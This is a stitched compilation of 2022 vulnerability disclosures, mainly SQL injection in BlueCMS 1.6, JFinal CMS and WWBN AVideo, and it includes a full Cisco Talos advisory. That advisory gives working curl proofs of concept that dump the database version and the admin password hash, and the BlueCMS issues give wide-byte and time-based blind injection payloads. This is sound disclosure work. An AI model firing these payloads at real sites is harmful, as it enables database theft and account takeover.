Bluecms 1.6 has SQL injection in line 132 of admin/area.php

**Bluecms\_v1.6****Download**

http://lp.downcode.com/j\_14/j\_14745\_bluecms.rar

**vulnerability code:**

in admin/area.php line 36:  
  
Line 36 of admin/area.php is not heavily filtered, and insert at line 47 allows injection  
Single quotes cannot be injected because the argument passed in is get\_magic\_quotes\_gpc()  
However, we found the use code GB2312 in the returned response header  
  
  
So we can do wide-byte injection here  
payload: area\_name=0%df',0,0,0,0),(0,@@Version,0,0,0,0)%23&parentid=0&show\_order=0&act=doadd  
  
  
Successful injection！

CVE-2022-37113: Bluecms V1.6 has SQL injection in line 132 of admin/area.php · Issue #3 · seizer-zyx/Vulnerability

BlueCMS 1.6 has SQL injection in line 55 of admin/model.php

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-37112: Bluecms V1.6 has SQL injection in line 55 of admin/model.php · Issue #2 · seizer-zyx/Vulnerability

BlueCMS 1.6 has SQL injection in line 132 of admin/article.php

**Bluecms\_v1.6****Download**

http://lp.downcode.com/j\_14/j\_14745\_bluecms.rar

**vulnerability code:**

in admin/article.php line132:  
  
There is numeric injection for $\_GET\['id'\]  
Because there is no echo, you can blind SQL injection with sleep()  
payload: id=1%20or%20if(1=1,sleep(1),0)  
  
payload: id=1%20or%20if(1=2,sleep(1),0)  
  
sleep () is executed based on the server response speed  
Use exp to get the database version number

CVE-2022-37111: Bluecms V1.6 has SQL injection in line 132 of admin/article.php · Issue #1 · seizer-zyx/Vulnerability

Authenticated (author+) SQL Injection (SQLi) vulnerability in Contest Gallery plugin <= 17.0.4 at WordPress.

 Verified

 Fixed

**7.6**

CVSS 3.1 score High severity

Monitoring Coming soon

PSID 

d4a1e0d8c02c

Classification 

SQL Injection

OWASP Top 10 

A1: Injection

Required privilege 

Requires author or higher role user authentication.

Publicly disclosed

2022-08-09

**Details**

Authenticated SQL Injection (SQLi) vulnerability discovered by Nguy Minh Tuan (Patchstack Alliance) in WordPress Contest Gallery plugin (versions <= 17.0.4).

**Solution**

Update the WordPress Contest Gallery plugin to the latest available version (at least 17.0.5).

**References**

CVE-2022-36394: WordPress Contest Gallery plugin <= 17.0.4 - Authenticated SQL Injection (SQLi) vulnerability - Patchstack

Multiple Authenticated (contributor+) Persistent Cross-Site Scripting (XSS) vulnerabilities in W3 Eden Download Manager plugin <= 3.2.48 at WordPress.

CVE-2022-34658: Download Manager

JFinal CMS 5.1.0 is vulnerable to SQL Injection via /jfinal_cms/system/role/list.

CVE-2022-37223: There is a SQL injection vulnerability exists in JFinal CMS 5.1.0  again · Issue #49 · jflyfox/jfinal_cms

JFinal CMS 5.1.0 is vulnerable to SQL Injection via /jfinal_cms/system/user/list.

CVE-2022-37199: There is a SQL injection vulnerability exists in JFinal CMS 5.1.0 · Issue #48 · jflyfox/jfinal_cms

Python 3.x through 3.10 has an open redirection vulnerability in lib/http/server.py due to no protection against multiple (/) at the beginning of URI path which may leads to information disclosure.

CVE-2021-28861: gh-87389: Fix an open redirection vulnerability in http.server. by gpshead · Pull Request #93879 · python/cpython

A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.This vulnerability arrises from the "msg" parameter which is inserted into the document with insufficient sanitization.

Permalink

**0** contributors

**Users who have contributed to this file**

\-- ### Credit

\-- 2022-Jul-07

\--

\-- Discovered by Claudio Bozzato of Cisco Talos.

\--

\-- TALOS-2022-1534

\--

\-- Now the userUpdate.json.php requires a request from the same domain as the AVideo site

\-- in addition all save and delete database calls require the same by default (a whitelist can be built hardcoding it in the objects/Object.php file)

\--

\-- TALOS-2022-1535

\--

\-- Session ID will only change if you are not logged in

\-- In case the session ID changes we will regenerate it with a new name avoiding reusing it

\--

\-- TALOS-2022-1536

\--

\-- plugin/Live/view/Live\_schedule/add.json.php and objects/playlistAddNew.json.php will deny updating if the users\_id is not = as the original record when it is editing

\--

\-- TALOS-2022-1537

\--

\-- Add a sanitize rule on the security file

\--

\--

\-- TALOS-2022-1539

\--

\-- Add a sanitize rule on the view/img/image403.php file itself

\--

\-- TALOS-2022-1540

\--

\-- Video title and the filename will always be sanitized on the setTitle method (sometimes more than once)

\--

\--

\-- TALOS-2022-1542

\--

\-- httponly set to true

\-- we are now using the passhash instead of the database pass in all site

\-- the passhash is totally different than the original DB password, it is an encrypted JSON and has an expiration time, and also will be automatically rejected if the original password is updated

\-- the login with the pass hash (database password field) directly will be disabled soon, for now, it is only enabled to buy some time to update the other third parties apps

\--

\-- TALOS-2022-1545

\--

\-- Fixed on TALOS-2022-1542

\--

\-- TALOS-2022-1546

\--

\-- Filename is now sanitized with escapeshellarg(safeString($filename,true));

\--

\-- TALOS-2022-1538

\--

\-- all 4 parameters are sanitized now

\-- also if the request does not come from the same site, the showAlertMessage() function will not be executed

\--

\-- TALOS-2022-1547

\--

\-- Now every time the admin login we will check if the new videos/.htaccess is there, and create it if it is not

\-- <IfModule !authz\_core\_module>

\-- Order Allow,Deny

\-- Deny from all

\-- </IfModule>

\-- <IfModule authz\_core\_module>

\-- Require all denied

\-- </IfModule>

\-- <filesMatch "\\.(ico|pdf|flv|jpg|jpeg|png|gif|swf|ts|txt|mp4|mp3|m3u8|webp|key|css|tff|woff|woff2)$">

\-- <IfModule !authz\_core\_module>

\-- Order Allow,Deny

\-- Allow from all

\-- </IfModule>

\-- <IfModule authz\_core\_module>

\-- Require all granted

\-- </IfModule>

\-- </filesMatch>

\--

\-- this will only allow access to only some specific file types inside the videos folder

\--

\-- TALOS-2022-1548

\--

\-- we now verify if is a valid URL properly, also we are using the escapeshellarg for URL and destination filename

\--

\-- TALOS-2022-1549

\--

\-- We now only download the downloadURL\_image if it is a valid URL NOT local files anymore

\--

\-- TALOS-2022-1551

\--

\-- All our classes were updated using the prepared statement to avoid SQL injection

\-- also \`videoDownloadedLink\` and \`duration\` are now sanitized

\-- if you are editing anything we now "forbidIfItIsNotMyUsersId"

\-- key and URL are now sanitized Clone plugin

\--

\-- TALOS-2022-1550

\--

\-- the url\_get\_contents now only download files from valid URLs or files from inside the cache folder

UPDATE configurations SET version \= '12.0', modified \= now() WHERE id \= 1;

CVE-2022-32772: AVideo/updateDb.v12.0.sql at e04b1cd7062e16564157a82bae389eedd39fa088 · WWBN/AVideo

A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.This vulnerability exists in the Live Schedules plugin, allowing an attacker to inject SQL by manipulating the description parameter.

**SUMMARY**

A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6  
WWBN AVideo dev master commit 3f7c0364

**PRODUCT URLS**

AVideo - https://github.com/WWBN/AVideo

**CVSSv3 SCORE**

8.3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H

**CWE**

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

**DETAILS**

AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

AVideo defines an abstract class ObjectYPT in objects/Object.php, which other objects should extend.

    abstract class ObjectYPT implements ObjectInterface
    {
        protected $fieldsName = [];
    
        public function __construct($id = "")
        {
            if (!empty($id)) { // [1]
                // get data from id
                $this->load($id);
            }
        }
        ...
    

This class provides an abstraction on top of the database, which allows to retrieve or create a new object depending on the id passed at object creation \[1\]. An interesting method defined in this class is called save, which allows to save the object into the database:

    public function save()
    {
        if (!$this->tableExists()) {
            _error_log("Save error, table " . static::getTableName() . " does not exists", AVideoLog::$ERROR);
            return false;
        }
        global $global;
        $fieldsName = $this->getAllFields();
        // [2]
        if (!empty($this->id)) {
            $sql = "UPDATE " . static::getTableName() . " SET ";
            $fields = [];
            foreach ($fieldsName as $value) {
                if (strtolower($value) == 'created') {
                    // do nothing
                } elseif (strtolower($value) == 'modified') {
                    $fields[] = " {$value} = now() ";
                } elseif (strtolower($value) == 'timezone') {
                    if (empty($this->$value)) {
                        $this->$value = date_default_timezone_get();
                    }
                    $fields[] = " `{$value}` = '{$this->$value}' "; // [7]
                } elseif (is_numeric($this->$value)) {
                    $fields[] = " `{$value}` = {$this->$value} ";
                } elseif (!isset($this->$value) || strtolower($this->$value) == 'null') {
                    $fields[] = " `{$value}` = NULL ";
                } else {
                    $fields[] = " `{$value}` = '{$this->$value}' "; // [5]
                }
            }
            $sql .= implode(", ", $fields);
            $sql .= " WHERE id = {$this->id}";
        }
        // [3]
        else {
            $sql = "INSERT INTO " . static::getTableName() . " ( ";
            $sql .= "`" . implode("`,`", $fieldsName) . "` )";
            $fields = [];
            foreach ($fieldsName as $value) {
                if (is_string($value) && (strtolower($value) == 'created' || strtolower($value) == 'modified')) {
                    $fields[] = " now() ";
                } elseif (is_string($value) && strtolower($value) == 'timezone') {
                    if (empty($this->$value)) {
                        $this->$value = date_default_timezone_get();
                    }
                    $fields[] = " '{$this->$value}' "; // [8]
                } elseif (!isset($this->$value) || (is_string($this->$value) && strtolower($this->$value) == 'null')) {
                    $fields[] = " NULL ";
                } elseif (is_string($this->$value) || is_numeric($this->$value)) {
                    $fields[] = " '{$this->$value}' "; // [6]
                } else {
                    $fields[] = " NULL ";
                }
            }
            $sql .= " VALUES (" . implode(", ", $fields) . ")";
        }
        $insert_row = sqlDAL::writeSql($sql); // [4]
        if ($insert_row) {
            if (empty($this->id)) {
                $id = $global['mysqli']->insert_id;
            } else {
                $id = $this->id;
            }
            return $id;
        } else {
            _error_log("ObjectYPT::save Error on save: " . $sql . ' Error : (' . $global['mysqli']->errno . ') ' . $global['mysqli']->error, AVideoLog::$ERROR);
            return false;
        }
    }
    

At \[2\] and \[3\] two different cases are handled: if the object already exists in the database, then an UPDATE query is perfomed, otherwise INSERT is used. The query is built inside the $sql variable, without using prepared statements. Finally, the $sql query is executed at \[4\].

At \[5\], \[6\], \[7\] and \[8\], strings are directly concatenated inside the query, leading to SQL injections if the values have not been previously sanitized. Several objects can be used to trigger this issue. We’ll look at some of them individually (note that this list might not be exhaustive, since there are many objects defined in the system, some with ad-hoc sanitization, depending on the functionality). Also note that we listed two vulnerable parameters for the “Live Schedules” page, however other parameters in the same page are potentially vulnerable too.

A note on exploitation chaining:  
Since these SQL injections happen inside INSERT or UPDATE in a MySQL database, they won’t allow direct arbitrary code execution in the database host, on default configurations. However, it is possible to dump the whole database by using any blind SQL injection technique. The database dump will contain the password hashes of all users, which can be used to login into accounts as demonstrated in TALOS-2022-1545. This will allow to log-in as administrator. In default configurations (that is, with $global['disableAdvancedConfigurations'] = 0), an administrator can upload plugins, which trivially leads to arbitrary command execution in the host.

A note on the PoCs:  
The PoCs listed below have been tested against dev master commit 3f7c0364. To make them work on release version 11.6 they have to be modified to account for the different columns in the target tables.

**CVE-2022-33147 - aVideoEncoder**

The objects/aVideoEncoder.json.php file can be used to add new videos. This functionality does not need special configuration to be used. However, the user performing the request needs permission to upload videos.

    $video = new Video("", "", @$_POST['videos_id']); // [1]
    ...
    $obj->video_id = @$_POST['videos_id'];
    ...
    if (!empty($_REQUEST['duration'])) {
        $duration = $video->getDuration();
        if (empty($duration) || $duration === 'EE:EE:EE') {
            $video->setDuration($_REQUEST['duration']);
        }
    }
    
    $status = $video->setAutoStatus();
    
    $video->setVideoDownloadedLink($_POST['videoDownloadedLink']);
    ...
    $video_id = $video->save(); // [4]
    

The Video class, defined in objects/video.php, extends ObjectYPT. A new instance is created at \[1\], and duration \[2\] and videoDownloadedLink \[3\] are set in the object. Finally, the video object is saved \[4\], which calls the vulnerable save function in ObjectYPT.

    public function setDuration($duration) {
        AVideoPlugin::onVideoSetDuration($this->id, $this->duration, $duration);
        $this->duration = $duration;
    }
    
    public function setVideoDownloadedLink($videoDownloadedLink) {
        AVideoPlugin::onVideoSetVideoDownloadedLink($this->id, $this->videoDownloadedLink, $videoDownloadedLink);
        $this->videoDownloadedLink = $videoDownloadedLink;
    }
    

Both videoDownloadedLink and duration are never sanitized, so they can be used to exploit the SQL injection in the save function.

**Exploit Proof of Concept**

The following proof-of-concept performs a SQL injection and executes the query select @@version, storing the result in the videoLink column.

    curl -k 'https://192.168.1.200/objects/aVideoEncoder.json.php' \
        -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=ia8sm01gdn8kar80bp0q5bsp9l' \
        --data-raw "format=mp4&duration=', 'video', '', NULL,now(), now(), (select @@version), '0', '0','0', '', '', NULL, NULL,NULL, '', '', '', '0', NULL)--+"
    {"error":false,"video_id":144,"video_id_hash":"MUFaem9hRDl5SEtlb1VnKzk0Z2ZMN3RBT2pPLytodmxoN1U4SE83ZVN6WT0="}%
    

The result of the injected select can be retrieved by querying the video list:

    curl -k 'https://192.168.1.200/objects/videos.json.php' \
        -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=ia8sm01gdn8kar80bp0q5bsp9l;' \
        | grep -o '.videoLink...[^"]*.'
    "videoLink":"10.8.3-MariaDB-1:10.8.3+maria~jammy-log"
    

**CVE-2022-33148 - Live Schedules title**

AVideo offers a plugin to stream RTMP videos over the network, called “Live”. By default this is disabled; an administrator can enable it in the plugin settings. Moreover, the user performing the request needs permission to stream videos.

In file plugin/Live/view/Live_schedule/add.json.php the class Live_schedule, which extends ObjectYPT, is used to add and/or update an object in the database:

    ...
    // [1]
    if (!User::canStream()) {
        $obj->msg = "You cant do this";
        die(json_encode($obj));
    }
    
    ...
    // [2]
    $o = new Live_schedule(@$_POST['id']);
    $o->setTitle($_POST['title']); // [3]
    $o->setDescription($_POST['description']);
    //$o->setKey($_POST['key']);
    $o->setUsers_id(User::getId());
    $o->setLive_servers_id($_POST['live_servers_id']);
    $o->setScheduled_time($_POST['scheduled_time']);
    $o->setStatus($_POST['status']);
    $o->setScheduled_password($_POST['scheduled_password']);
    //$o->setPoster($_POST['poster']);
    //$o->setPublic($_POST['public']);
    //$o->setSaveTransmition($_POST['saveTransmition']);
    //$o->setShowOnTV($_POST['showOnTV']);
    
    if(!empty($_REQUEST['users_id_company'])){
        $myAffiliation = CustomizeUser::getAffiliateCompanies(User::getId());
        $users_id_list = array();
        foreach ($myAffiliation as $value) {
            $users_id_list[] = $value['users_id_company'];
        }
        if(in_array($_REQUEST['users_id_company'], $users_id_list)){
            $o->setusers_id_company($_REQUEST['users_id_company']);
        }
    }
    
    // [4]
    if ($id = $o->save()) {
        $obj->msg = "{$_POST['title']} ".__('Saved');
        $obj->error = false;
    } else {
        $obj->msg = __('Error on save')." {$_POST['title']}";
    }
    ...
    

At \[1\] the code checks if the user is allowed to stream. At \[2\] a new live schedule is created, passing the id parameter. At \[3\] title field is set from the title POST parameter.  
The function setTitle is defined as:

    public function setTitle($title)
    {
        $this->title = $title;
    }
    

There is no sanitization of the title parameter, so calling save at \[4\] can trigger the SQL injection.

**Exploit Proof of Concept**

The following proof-of-concept performs a SQL injection and stores the admin’s password hash in the description field of a new live schedule.

    curl -k 'https://192.168.1.200/plugin/Live/view/Live_schedule/add.json.php' \
        -X POST -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=8hi96ivv13595mm5cebe2am5pb;' \
        --data-raw $'id=&status=a&scheduled_time=2022-07-01+19%3A45&title=\',(select password from users where user = "admin"), \'1234\', \'2\', NULL, now(), now(), \'2032-06-01 19:45\', \'UTC\' ,  \'a\' ,  NULL ,  NULL ,  NULL ,  NULL ,  \'pass\' ,  NULL )--+'
    

To get the admin’s hash, it’s enough to retrieve the live schedule list:

    curl -sk 'https://192.168.1.200/plugin/Live/view/Live_schedule/list.json.php?users_id=2' \
        -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=8hi96ivv13595mm5cebe2am5pb'|grep -o '.description...[^"]*.'
    "description":"97fbb646f466baeacca5d79f5567c771"
    

**CVE-2022-33149 - CloneSite**

AVideo offers a plugin to clone an AVideo website, called “CloneSite “. By default this is disabled; an administrator can enable it in the plugin settings. No authentication is required to exploit this vulnerability.

In file plugin/CloneSite/cloneServer.json.php there’s a call to Clones::thisURLCanCloneMe \[3\], that passes $_GET['url'] \[1\] and $_GET['key'] \[2\] as parameters

    ...
    $resp->url = $_GET['url']; // [1]
    $resp->key = $_GET['key']; // [2]
    $resp->useRsync = intval($_GET['useRsync']);
    $resp->videosDir = Video::getStoragePath()."";
    $resp->sqlFile = "";
    $resp->videoFiles = [];
    $resp->photoFiles = [];
    
    $objClone = AVideoPlugin::getObjectDataIfEnabled("CloneSite");
    if (empty($objClone)) {
        $resp->msg = "CloneSite is not enabled on the Master site";
        die(json_encode($resp));
    }
    
    
    if (empty($resp->key)) {
        $resp->msg = "Key cannot be blank";
        die(json_encode($resp));
    }
    
    // check if the url is allowed to clone it
    $canClone = Clones::thisURLCanCloneMe($resp->url, $resp->key); // [3]
    ...
    

The Clones class is defined in plugin/CloneSite/Objects/Clones.php:

    public static function thisURLCanCloneMe($url, $key)
    {
        $resp = new stdClass();
        $resp->canClone = false;
        $resp->clone = null;
        $resp->msg = "";
    
        $clone = new Clones(0);
        $clone->loadFromURL($url); // [4]
        if (empty($clone->getId())) {
            $resp->msg = "The URL {$url} was just added in our server, ask the Server Manager to approve this URL on plugins->Clone Site->Clones Manager (The Blue Button) and Activate your client";
            self::addURL($url, $key); // [5]
            return $resp;
        }
        ...
    

If the url does not exist \[4\], addURL is called \[5\]:

    public static function addURL($url, $key)
    {
        $clone = new Clones(0);
        $clone->loadFromURL($url);
        if (empty($clone->getId())) {
            $clone->setUrl($url);
            $clone->setKey($key);
            return $clone->save();
        }
        return false;
    }
    
    public function setUrl($url)
    {
        $this->url = $url;
    }
    
    public function setKey($key)
    {
        $this->key = $key;
    }
    

addURL eventually creates a new Clones object and saves it. The Clones class extends ObjectYPT, so it’s subject to the usual SQL injection. key has been previously sanitized in objects/security.php, since it’s present in the $securityFilter list:

    $securityFilter = ['error', 'catName', 'type', 'channelName', 'captcha', 'showOnly', 'key', 'link', 'email', 'country', 'region', 'videoName'];
    

The url parameter however has not been sanitized, so it can be used to exploit the SQL injection.

**Exploit Proof of Concept**

The following proof-of-concept performs a SQL injection and executes the query select sleep(2). We can see by measuring the time it takes to return, that the request takes just a little more than 2 seconds.

    time curl -k $'https://192.168.1.200/plugin/CloneSite/cloneServer.json.php?key=somekey&url=someurl\',\'a\',(select+sleep(2)),NULL,now(),now())--+'
    

**CVE-2022-34652 - Live Schedules description**

AVideo offers a plugin to stream RTMP videos over the network, called “Live”. By default this is disabled; an administrator can enable it in the plugin settings. Moreover, the user performing the request needs permission to stream videos.

In file plugin/Live/view/Live_schedule/add.json.php the class Live_schedule, which extends ObjectYPT, is used to add and/or update an object in the database:

    ...
    // [1]
    if (!User::canStream()) {
        $obj->msg = "You cant do this";
        die(json_encode($obj));
    }
    
    ...
    // [2]
    $o = new Live_schedule(@$_POST['id']);
    $o->setTitle($_POST['title']);
    $o->setDescription($_POST['description']);  // [3]
    //$o->setKey($_POST['key']);
    $o->setUsers_id(User::getId());
    $o->setLive_servers_id($_POST['live_servers_id']);
    $o->setScheduled_time($_POST['scheduled_time']);
    $o->setStatus($_POST['status']);
    $o->setScheduled_password($_POST['scheduled_password']);
    //$o->setPoster($_POST['poster']);
    //$o->setPublic($_POST['public']);
    //$o->setSaveTransmition($_POST['saveTransmition']);
    //$o->setShowOnTV($_POST['showOnTV']);
    
    if(!empty($_REQUEST['users_id_company'])){
        $myAffiliation = CustomizeUser::getAffiliateCompanies(User::getId());
        $users_id_list = array();
        foreach ($myAffiliation as $value) {
            $users_id_list[] = $value['users_id_company'];
        }
        if(in_array($_REQUEST['users_id_company'], $users_id_list)){
            $o->setusers_id_company($_REQUEST['users_id_company']);
        }
    }
    
    // [4]
    if ($id = $o->save()) {
        $obj->msg = "{$_POST['title']} ".__('Saved');
        $obj->error = false;
    } else {
        $obj->msg = __('Error on save')." {$_POST['title']}";
    }
    ...
    

At \[1\] the code checks if the user is allowed to stream. At \[2\] a new live schedule is created, passing the id parameter. At \[3\] description field is set from the description POST parameter.  
The function setDescription is defined as:

    public function setDescription($description)
    {
        $this->description = $description;
    }
    

There is no sanitization of the description parameter, so calling save at \[4\] can trigger the SQL injection.

**Crash Information**

The following proof-of-concept performs a SQL injection and stores the admin’s password hash in the key field of a new live schedule.

    curl -k 'https://192.168.1.200/plugin/Live/view/Live_schedule/add.json.php' \
        -X POST -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=8hi96ivv13595mm5cebe2am5pb;' \
        --data-raw $'id=&status=a&scheduled_time=2022-07-01+19%3A45&title=test&description=\',(select password from users where user = "admin"), \'2\', NULL, now(), now(), \'2032-06-01 19:45\', \'UTC\' ,  \'a\' ,  NULL ,  NULL ,  NULL ,  NULL ,  \'pass\' ,  NULL )--+'
    

To get the admin’s hash, it’s enough to retrieve the live schedule list:

    curl -sk 'https://192.168.1.200/plugin/Live/view/Live_schedule/list.json.php?users_id=2' \
        -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=8hi96ivv13595mm5cebe2am5pb'|grep -o '.key...[^"]*.'
    "key":"97fbb646f466baeacca5d79f5567c771"
    

**VENDOR RESPONSE**

Vendor confirms issues fixed on July 7th 2022

**TIMELINE**

2022-06-29 - Initial Vendor Contact  
2022-07-05 - Vendor Disclosure  
2022-07-07 - Vendor Patch Release  
2022-08-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

Tag

#sql